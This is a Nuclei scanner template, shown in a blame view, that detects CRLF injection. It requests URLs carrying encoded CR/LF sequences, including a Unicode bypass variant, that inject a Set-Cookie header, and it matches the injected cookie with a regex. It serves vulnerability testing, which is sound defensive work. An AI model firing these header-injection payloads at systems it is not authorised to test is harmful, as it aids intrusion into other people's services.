nuclei-templates/vulnerabilities/crlf-injection.yaml

18 lines
470 B
YAML
Raw Normal View History

id: crlf-injection
info:
name: CRLF injection
author: nadino
severity: low
requests:
- method: GET
path:
- "{{BaseURL}}/%0D%0ASet-Cookie:crlfinjection=crlfinjection"
2020-05-25 08:24:39 +00:00
- "{{BaseURL}}/%E5%98%8D%E5%98%8ASet-Cookie:crlfinjection=crlfinjection" # Unicode bypass
matchers:
2020-05-24 12:22:35 +00:00
- type: regex
regex:
- '(?m)^(?:Set-Cookie\s*?:(?:\s*?|.*?;\s*?))(crlfinjection=crlfinjection)(?:\s*?)(?:$|;)'
2020-05-24 12:22:35 +00:00
part: header